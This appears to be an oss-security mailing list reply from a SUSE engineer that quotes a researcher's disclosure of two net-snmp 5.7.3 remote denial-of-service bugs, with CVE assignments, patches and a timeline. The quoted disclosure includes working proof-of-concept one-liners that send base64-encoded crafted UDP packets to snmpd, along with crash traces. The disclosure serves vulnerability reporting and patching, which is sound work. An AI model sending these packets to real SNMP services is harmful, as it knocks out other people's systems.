Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 9 Oct 2018 00:31:32 +0200
From: Alexander Bergmann <abergmann@...e.com>
To: Magnus Klaaborg Stubman <magnus@...bman.eu>
Cc: oss-security@...ts.openwall.com
Subject: Re: net-snmp 5.7.3 unauthenticated remote Denial of
 Service (exploit available)

Hi Magnus,

thanks for your report. I can reproduce VULN#2 (CVE-2018-18065) with our
net-snmp-5.7.3 version (sle12/sle15). Our net-snmp-5.4.2.1 version seams
to be unaffected.

Regarding your VULN#1 (CVE-2018-18066) I noticed that the patch was
already applied to our code base and CVE-2015-5621 was assigned. The
issue was already mentioned here at oss-security.

https://www.openwall.com/lists/oss-security/2015/07/31/1

I didn't check the details yet, but if the new CVE is a duplicate,
please contact NIST about it.


Kind regards,
Alex~

On Mon, Oct 08, 2018 at 08:46:29PM +0200, Magnus Klaaborg Stubman wrote:
> Reference: https://dumpco.re/blog/net-snmp-5.7.3-remote-dos
> 
> 2018-10-08
> 
> NET-SNMP REMOTE DOS
> ===================
> 
> Back in january I did some vulnerability research of net-snmp 5.7.3 and found some bugs. 
> Here they are:
> 
> VULN#1 CVE-2018-18066
> =====================
> 
> First bug is remotely exploitable without knowledge of the community string, and leads to Denial of Service:
> 
>   # echo -n "MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBwbwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBAChWQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEHCobetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111
> 
>   # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln  127.0.0.1:1111
>   ASAN:SIGSEGV
>   =================================================================
>   ==41810==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007f261b bp 0x7fff34754550 sp 0x7fff34754220 T0)
>       #0 0x7f261a in snmp_oid_compare /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470:13
>       #1 0x7f261a in _snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4247
>       #2 0x7f261a in snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4336
>       #3 0x7f261a in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5241
>       #4 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
>       #5 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
>       #6 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
>       #7 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
>       #8 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
>       #9 0x7f2561efeb44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
>       #10 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)
> 
>   AddressSanitizer can not provide additional info.
>   SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470 snmp_oid_compare
>   ==41810==ABORTING
> 
> 
> Same configuration for both bugs:
> 
>   magnus@...b0x:~/projects/net-snmp$ cat snmpd.conf
>   rocommunity public  default    -V systemonly
>   rocommunity public  localhost    -V systemonly
>   rouser   authOnlyUser
>   syslocation  "On the Desk"
>   syscontact  Me <me@...mple.org>
> 
> VULN#2 CVE-2018-18065
> =====================
> 
> Second bug is remotely exploitable only with knowledge of the community string (in this case "public") leading to Denial of Service:
> 
>   # echo -n "MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIuMzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQNMjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111
> 
>   # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln  127.0.0.1:1111
>   ASAN:SIGSEGV
>   =================================================================
>   ==41062==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000410 (pc 0x00000075bc0f bp 0x7ffdda226b10 sp 0x7ffdda2269e0 T0)
>       #0 0x75bc0e in _set_key /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564:9
>       #1 0x75bc0e in _data_lookup /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:614
>       #2 0x75bc0e in _container_table_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:749
>       #3 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
>       #4 0x572dc4 in netsnmp_call_next_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:640:12
>       #5 0x58751c in table_helper_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table.c:713:9
>       #6 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
>       #7 0x572c79 in netsnmp_call_handlers /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:611:14
>       #8 0x520d86 in handle_var_requests /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:2679:22
>       #9 0x524dbe in handle_pdu /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3441:18
>       #10 0x51b976 in netsnmp_handle_request /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3284:14
>       #11 0x515876 in handle_snmp_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:1990:10
>       #12 0x7f3558 in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5437:7
>       #13 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
>       #14 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
>       #15 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
>       #16 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
>       #17 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
>       #18 0x7fc1acb11b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
>       #19 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)
> 
>   AddressSanitizer can not provide additional info.
>   SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564 _set_key
>   ==41062==ABORTING
> 
> 
> PATCHES
> =======
> 
> Update to net-snmp-5.8 or apply the following patches:
> 
> Vuln#1: sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791
> Vuln#2: sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d
> 
> AFFECTED
> ========
> 
> - 5.7.3
> - 5.5.2.1
> - 5.6.2.1
> 
> More versions may be affected as well.
> 
> TIMELINE
> ========
> 
> 2015-04-11 Vendor releases patch of bug#1 in version control - no public article or otherwise disclosure
> 2016-10-06 Vendor releases patch of bug#2 in version control - no public article or otherwise disclosure
> 2018-01-05 I discovered both bugs
> 2018-01-08 Vendor notified
> 2018-01-08 Vendor responds - bugs already fixed in version control repo
> 2018-10-08 Public disclosure of exploit
> 2018-10-08 CVE-ID assignment
> 
> 
> PROOF OF DISCOVERY
> ==================
> 
>   # cat vuln1 | base64
>   MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBw
>   bwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBACh
>   WQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEH
>   CobetzgECzE3Mi4zMS4xOS4y
>   # sha256sum vuln1
>   b2ff63c97c705c25c0043758cbd7b1e00cb5692ba1223712a17461082a047125  vuln1
>   twitter.com/magnusstubman/status/949520650762358789
> 
>   # cat vuln2 | base64
>   MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIu
>   MzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQN
>   MjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y
>   # sha256sum vuln2
>   b7f0e494b8a91c6fedb7e13b3b8dab68a951b5fdc21dd876ae91eb86924018f2  vuln2
>   twitter.com/magnusstubman/status/949520565064404994
> 
> 
> REFERENCES
> ==========
> 
> - sourceforge.net/p/net-snmp/bugs/2820
> - sourceforge.net/p/net-snmp/bugs/2819
> 
> 
> CVE ASSIGNMENTS
> ===============
> 
> > [Suggested description]
> > _set_key in agent/helpers/table_container.c in
> > Net-SNMP before 5.8
> > has a NULL Pointer Exception bug that can be used by an
> > authenticated attacker to remotely cause the instance to crash via a crafted UDP packet,
> > resulting in Denial of Service.
> >
> > ------------------------------------------
> >
> > [Additional Information]
> > Proof of concept exploit are publicly available at dumpco.re/blog/net-snmp-5.7.3-remote-dos
> >
> > ------------------------------------------
> >
> > [VulnerabilityType Other]
> > Remote Denial of Service (Null Pointer Exception)
> >
> > ------------------------------------------
> >
> > [Vendor of Product]
> > net-snmp
> >
> > ------------------------------------------
> >
> > [Affected Product Code Base]
> > net-snmp - vulnerable: 5.7.3, 5.5.2.1, 5.6.2.1. Fixed in: 5.8
> >
> > ------------------------------------------
> >
> > [Affected Component]
> > snmpd
> >
> > ------------------------------------------
> >
> > [Attack Type]
> > Remote
> >
> > ------------------------------------------
> >
> > [Impact Denial of Service]
> > true
> >
> > ------------------------------------------
> >
> > [Attack Vectors]
> > A crafted UDP packet must be sent to the target.
> >
> > ------------------------------------------
> >
> > [Reference]
> > dumpco.re/blog/net-snmp-5.7.3-remote-dos
> > sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d
> >
> > ------------------------------------------
> >
> > [Has vendor confirmed or acknowledged the vulnerability?]
> > true
> 
> Use CVE-2018-18065.
> 
> 
> > [Suggested description]
> > snmp_oid_compare in snmplib/snmp_api.c in
> > Net-SNMP before 5.8
> > has a NULL Pointer Exception bug that can be used by an
> > unauthenticated attacker to remotely cause the instance to crash via a crafted UDP packet,
> > resulting in Denial of Service.
> >
> > ------------------------------------------
> >
> > [Additional Information]
> > Proof of concept exploit are publicly available at dumpco.re/blog/net-snmp-5.7.3-remote-dos
> >
> > ------------------------------------------
> >
> > [VulnerabilityType Other]
> > Remote Denial of Service (NULL Pointer Exception)
> >
> > ------------------------------------------
> >
> > [Vendor of Product]
> > net-snmp
> >
> > ------------------------------------------
> >
> > [Affected Product Code Base]
> > net-snmp - vulnerable: 5.7.3, 5.5.2.1, 5.6.2.1. Fixed in: 5.8
> >
> > ------------------------------------------
> >
> > [Affected Component]
> > snmpd
> >
> > ------------------------------------------
> >
> > [Attack Type]
> > Remote
> >
> > ------------------------------------------
> >
> > [Impact Denial of Service]
> > true
> >
> > ------------------------------------------
> >
> > [Attack Vectors]
> > A crafted UDP packet must be sent to the target.
> >
> > ------------------------------------------
> >
> > [Reference]
> > dumpco.re/blog/net-snmp-5.7.3-remote-dos
> > sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791
> > sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d
> >
> > ------------------------------------------
> >
> > [Has vendor confirmed or acknowledged the vulnerability?]
> > true
> 
> Use CVE-2018-18066.
> 
> 
> --
> CVE Assignment Team
> M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
> [ A PGP key is available for encrypted communications at
>   cve.mitre.org/cve/request_id.html ]

-- 
Alexander Bergmann <abergmann@...e.com>, Security Engineer, GPG:9FFA4886
SUSE Linux GmbH, GF: Felix Imend├Ârffer, Jane Smithard, Graham Norton
HRB 21284 (AG N├╝rnberg)

Download attachment "signature.asc" of type "application/pgp-signature" (474 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.